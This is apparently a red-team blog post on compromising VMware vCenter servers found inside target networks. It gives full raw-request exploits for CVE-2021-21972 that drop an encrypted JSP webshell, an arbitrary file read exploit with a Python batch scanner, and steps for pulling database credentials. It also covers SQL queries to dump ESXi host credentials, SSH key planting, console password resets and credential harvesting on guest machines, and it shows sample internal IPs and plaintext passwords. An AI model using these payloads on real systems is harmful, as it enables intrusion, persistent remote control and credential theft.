Preface
During several recent HW (护网) engagements I ran into quite a few VMware vCenter instances inside target intranets. This post collects the exploitation methods that worked in those environments.
Obtaining vCenter through Struts2 command execution
While browsing the target, the following addresses were found.
Commands were executed through the Struts2 vulnerability on that host.
https://ip/statsreport/
https://10.72.0.110/statsreport/instance.jsp
https://10.72.0.110/statsreport/timezoone.jsp
https://10.72.0.110/statsreport/statsrepr.jsp
VMware vCenter unauthenticated file upload RCE
Vulnerability description
The vSphere Client component of VMware vCenter contains an unauthenticated arbitrary file upload vulnerability and a server-side request forgery (SSRF) vulnerability, both in the vROps plugin endpoint under /ui/vropspluginui/ (the SSRF is CVE-2021-21973, from the same advisory). The unauthenticated upload is CVE-2021-21972: the endpoint accepts a tar archive and extracts it without sanitising member names, so a member name containing ../ lands wherever the service account can write. That is enough to drop a webshell under one of the web roots on the vCenter server and take control of it.
Affected versions
7.0 releases before 7.0 U1c
6.7 releases before 6.7 U3l
6.5 releases before 6.5 U3n
Linux PoC (raw request; the body is a tar archive whose member names carry the traversal)
POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json
Content-Length: 894
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH8GoragzRFVTw1VD
------WebKitFormBoundaryH8GoragzRFVTw1VD
Content-Disposition: form-data; name="uploadFile"; filename="a.tar"
Content-Type: text/plain
../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/0000755000000000000000000000000014015431210027145 5ustar rootroot../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/shell.jsp0000644000000000000000000000117114015430711030777 0ustar rootroot<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%>
------WebKitFormBoundaryH8GoragzRFVTw1VD--
Windows PoC (same request, with a backslash traversal into the perfcharts web root)
POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json
Content-Length: 894
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH8GoragzRFVTw1VD
------WebKitFormBoundaryH8GoragzRFVTw1VD
Content-Disposition: form-data; name="uploadFile"; filename="a.tar"
Content-Type: text/plain
..\..\ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\webshell.jsp0000644000000000000000000000102500000000000032532 0ustar00000000000000<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundaryH8GoragzRFVTw1VD--
Webshell dropped by the PoC
On both Windows and Linux, writing a webshell through this upload gives RCE.
Default webshell path on Windows:
C:\ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\webshell.jsp
Default webshell path on Linux:
/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/webshell.jsp
Note that the numbered deployer directory (42 here) is specific to the deployment; if the shell does not appear, try the neighbouring numbers. On Linux the upload runs as the vsphere-ui service user, not root, so the written file carries that user's permissions.
If SSH on the Linux appliance is reachable, an alternative is to write an SSH public key through the same upload and log in with it instead of using a webshell.
VMware vCenter arbitrary file read, batch detection
Affected versions
Fixed in 6.5u1.
PoC: on Windows, request
http://ip/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
Core of the batch script
Note: Linux targets were also found during verification, so a simple Linux check was added; the payload format is the same on both platforms.
import requests
import urllib3

urllib3.disable_warnings()  # vCenter certificates are usually self-signed

# Windows probe (vcdb.properties) and Linux probe (/etc/passwd); the id= parameter is the same on both.
payloads = [r'/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties',
            r'/eam/vib?id=/etc/passwd']
path_out = 'vuln.txt'   # vulnerable URLs are appended here
countLines = 0          # total number of targets, set by the caller
left = 0                # targets remaining, updated by the caller

def http_request(url):
    try:
        print("Trying:" + url + ' ' + '[' + str(left) + '/' + str(countLines) + ']')
        for payload in payloads:
            vulurl = url + payload
            print(vulurl)
            r = requests.get(url=vulurl, timeout=10, verify=False)
            # vcdb.properties has a 'driver' key; /etc/passwd begins with 'root:'
            if r.status_code == 200 and ('driver' in r.text or 'root:' in r.text):
                print("\033[1;40;32m[Vuln] {}\033[0m".format(vulurl))
                with open(path_out, 'a') as f:
                    f.write(vulurl + '\n')
                return
            else:
                print("[-]" + "r.status_code:" + str(r.status_code) + "," + "r.text:" + r.text)
    except Exception as err:
        print(err)
vCenter default installation path and the database configuration file with its credentials
C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
url = jdbc:oracle:thin:@//172.16.129.101:1521/hgvpxdb
username = vpxadmin
password = oracle
SQL to list the virtual machines (count, IP, name, disk image path):
select * from vpxv_vms
SQL to list the ESXi hosts with their stored accounts and passwords:
select * from vpxv_hosts
vCenter ESXi
Accessing ESXi: the host passwords are in the database table above, but they are stored encrypted and I have not yet found a way to decrypt them.
https://172.16.129.6
Resetting the vCenter management console password
This is the vCenter management console. Its password can be reset from the server itself (prerequisite: you already have access to that server).
https://172.16.129.100/ui
https://172.16.129.100/ui/saml/websso/sso
https://blog.csdn.net/weixin_34075551/article/details/91504733 (after resetting the password you can log in)
Extracting account credentials from the virtual machines
Once inside a guest machine, download this tool:
https://www.nirsoft.net/utils/network_password_recovery.html The results from scanning the guest could not be copied out; if MSSQL is involved, the file can be viewed with `type` instead.
VMware vSphere CVE-2021-21972
http://10.1.0.235/ui/vropspluginui/rest/services/uploadova (getshell with the exploit script)
References
https://blog.csdn.net/weixin_34075551/article/details/91504733